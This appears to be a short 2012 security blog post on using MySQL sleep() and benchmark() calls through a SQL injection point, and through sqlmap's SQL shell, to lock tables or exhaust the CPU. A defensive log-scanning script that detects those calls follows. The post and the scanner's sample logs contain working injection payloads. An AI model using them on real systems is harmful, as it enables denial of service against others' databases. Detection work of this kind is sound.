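281 sqlmap DOS
Posted on 2012-10-7 20:25:00
When MySQL has an injection point and the injected sleep statement is passed a sufficiently large argument, for example sleep(9999999999):
If the database uses the MyISAM engine and the injection point is in a statement that locks the table (insert, replace, update, delete), access to the whole table is blocked.
Read requests from every application that uses the table are blocked.
An example. When I run: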
    root@ubuntu:~# mysql -u root -p
    Enter password:
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 34
    Server version: 5.1.61-0ubuntu0.10.10.1-log (Ubuntu)

    Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    mysql> select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f);
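The server's CPU instantly hits 99%.

Injection works by operating on the database, so a single injection point is enough for a DoS.
For example: http://5.5.5.8/pen/news.php?id=1%20union%20select%201,benchmark%2899999999,md5%280x41%29%29

Doing it with sqlmap: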
    root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --sql-shell
    sql-shell> select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
    [21:19:49] [INFO] fetching SQL SELECT statement query output: 'select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)'
    [21:19:49] [WARNING] reflective value(s) found and filtering out




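A defensive check for the kind of request shown in the post, as an added example that is not part of the original post: it scans web access log lines for sleep() or benchmark() calls with oversized arguments. The log format, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Thresholds are assumptions for this example; tune them to your application.
LIMITS = {"sleep": 5, "benchmark": 100_000}

# sleep(<n>) or benchmark(<n>, ...), case-insensitive, whitespace tolerated.
CALL_RE = re.compile(r"\b(sleep|benchmark)\s*\(\s*(\d+(?:\.\d+)?)", re.IGNORECASE)
LOG_RE = re.compile(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP')

def decode_fully(value, max_rounds=3):
    """Undo repeated URL encoding (e.g. %2528 -> %28 -> '(')."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_delay_calls(request_target):
    """Return [(function, argument)] for calls whose argument exceeds LIMITS."""
    hits = []
    for name, arg in CALL_RE.findall(decode_fully(request_target)):
        if float(arg) > LIMITS[name.lower()]:
            hits.append((name.lower(), arg))
    return hits

def scan_access_log(lines):
    """Return [(client_ip, function, argument)] for suspicious requests."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            results += [(m.group(1), n, a) for n, a in find_delay_calls(m.group(2))]
    return results

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Oct/2012:20:25:00 +0800] "GET /pen/news.php?id=1 HTTP/1.1" 200 512',
    '192.0.2.66 - - [07/Oct/2012:20:26:10 +0800] "GET /pen/news.php?id=1%20union%20select%201,benchmark%2899999999,md5%280x41%29%29 HTTP/1.1" 200 0',
    '192.0.2.66 - - [07/Oct/2012:20:27:00 +0800] "GET /pen/news.php?id=1%2520and%2520sleep%25289999999999%2529 HTTP/1.1" 200 0',
    '192.0.2.20 - - [07/Oct/2012:20:28:00 +0800] "GET /search?q=sleep(2)+tips HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Access logs only show the request line, so parameters sent in a POST body are not covered by this check; the MySQL slow query log or general query log can be searched for the same function calls.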
